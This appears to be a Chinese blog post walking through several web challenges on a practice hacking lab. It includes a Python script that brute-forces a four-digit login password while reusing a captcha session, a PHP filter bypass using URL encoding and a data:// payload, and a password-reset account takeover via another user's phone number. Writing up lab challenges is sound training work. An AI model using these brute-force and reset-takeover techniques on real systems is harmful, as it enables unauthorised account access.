Tips:这个题目真不是随便设置的。 什么才是空的呢? 通关地址:没有,请直接提交答案(小写即可)

所在输入框写入null ,即可得到key

五题:逗比验证码第一期

源码:

 ​
 <html>
     <head>
         <meta http-equiv="content-type" content="text/html;charset=utf-8">
     </head>
     <body>
        登陆密码是4位纯数字数,第一位不为0
    <form action="login.php" method="POST">
            User: <input type="text" value="admin" name="username"><br>
            Password: <input type="password" value="" name="pwd"><br>
            Vcode: <input type="text" value="" name="vcode"><br>
             <img src="http://vc.sinaapp.com/img.php?key=k-15692259986111"><br>
             <input type="submit" value="submit" name="submit"><br>
         </form>
     </body>
 </html>

根据源代码可以看出:二维码来自一个网址:

burp suite 拦截数据包

发现多次提交后只要Cookie不变,验证码就不会改变,这就想到了验证码创建一个会话(Session)

脚本:

 import requests
 import re
 from PIL import  Image
 ​
 url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php"
 login_url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
 ​
 s = requests.session()
 ​
 r = s.get(url).text
 ​
 p = str(re.findall(r'<img src="(.*?)"><br>',r))
 p = p[2:]
 p = p[:-2]
 print(p)
 p1 = requests.get(p)
 f= open('1.jpg','wb').write(p1.content)
 im=Image.open('1.jpg')
 Image._show(im)
 print("请输入验证码:")
 vcode=input()
 for i in range(999,10000):
     data = {"username":"admin","pwd":str(i),"vcode":vcode,"submit":"submit"}
     key = s.post(login_url,data=data).text
     print(key)
     print("try:"+str(i))
     if not "error" in key:
         print(key)
         break
 ​

运行脚本即可得到key

方法二burp suite 爆破,

爆破结果为1238

六题/七题

给五题一样,就是吧验证码设置为空进行爆破就OK了

八题微笑一下就能过关了

url:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php

页面源代码

 ​
   
 <!doctype html>
 <html lang="en">
 ​
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 <title>Show me your smile :)</title>
 <link rel="stylesheet" href="style.css">
 </head>
 ​
 <body>
 <br><br><br><br><br><br><br>
 <div class="loginform cf">
     <form name="login" action="index.php" method="POST" accept-charset="utf-8">
         <ul>
             <li>
                 <label for="SMILE">请使用微笑过关<a href="?view-source">源代码</a></label>
                 <input type="text" name="T_T" placeholder="where is your smile" required>
             </li>
             <li><input type="submit" value="Show"> </li>
         </ul>
     </form>
 </div>
 <div style="text-align:center;clear:both">
 </div>
 </body>
 ​
 </html>

查看源代码发现?view-source源代码页面地址打开

 <?php  
     header("Content-type: text/html; charset=utf-8");
     if (isset($_GET['view-source'])) {
         show_source(__FILE__);
         exit();
     }
 ​
     include('flag.php');
 ​
     $smile = 1;  
 ​
    if (!isset ($_GET['^_^'])) $smile = 0;  
     if (preg_match ('/\./', $_GET['^_^'])) $smile = 0;  
     if (preg_match ('/%/', $_GET['^_^'])) $smile = 0;  
     if (preg_match ('/[0-9]/', $_GET['^_^'])) $smile = 0;  
     if (preg_match ('/http/', $_GET['^_^']) ) $smile = 0;  
     if (preg_match ('/https/', $_GET['^_^']) ) $smile = 0;  
     if (preg_match ('/ftp/', $_GET['^_^'])) $smile = 0;  
     if (preg_match ('/telnet/', $_GET['^_^'])) $smile = 0;  
     if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0;
     if ($smile) {
         if (@file_exists ($_GET['^_^'])) $smile = 0;  
     }  
     if ($smile) {
         $smile = @file_get_contents ($_GET['^_^']);//file_get_contents() 函数把整个文件读入一个字符串中  
         if ($smile === "(●'◡'●)") die($flag);  
     }  
 ?>  
 <!doctype html>
 <html lang="en">
 ​
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 <title>Show me your smile :)</title>
 <link rel="stylesheet" href="style.css">
 </head>
 ​
 <body>
 <br><br><br><br><br><br><br>
 <div class="loginform cf">
     <form name="login" action="index.php" method="POST" accept-charset="utf-8">
         <ul>
             <li>
                 <label for="SMILE">请使用微笑过关<a href="?view-source">源代码</a></label>
                 <input type="text" name="T_T" placeholder="where is your smile" required>
             </li>
             <li><input type="submit" value="Show"> </li>
         </ul>
     </form>
 </div>
 <div style="text-align:center;clear:both">
 </div>
 </body>
 ​
 </html>

发现变量为^_^但是下面进行了过滤

既要对”^^”赋值,又得想办法去掉”^^”中的”_”,那么可以采用Url编码变为”%5f”.所以我们输入就应该为 “^%5f^”.

代码把 http https ftp telnet 这些给过滤了,而又要求通过file_get_contents()取出$GET[‘^^’]里的值.但,$GET[‘^^’]又必须不存在.所以$GET[‘^^’]只能是字符串”(●’◡’●)”,不可能是文件名.那么file_get_contents()里的参数应该是啥呢.查了一下,发现data://完美符合.所以我们输入就应该为”^%5f^=data:,(●’◡’●)”

十题:逗比的手机验证码

66的验证码可以用在67上,所以用66获取验证码,用67 和验证码登录

?

综合关

第一题渗透测试第

注意:该题目模拟真实环境,故具有排他性,请选择合适的时间段完成该题。 你只有一部可用手机,手机号码会在需要手机号码的页面中给出。 通关地址

根据页面有登录,忘记密码,注册用户三个选项

点忘记密码,查看页面源代码

输入用户名和电话号码后发现不能获取验证码,我们转到注册界面,注册自己的用户,注册成功之后会转到

我们刚在页面源代码中发现了一个手机号所以我们这个绑定这个手机号并且拦截,

会反弹手机号绑定成功,再回到主页面,进入忘记密码,找回密码之后

从新登录就可登录拿到key

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注

标签云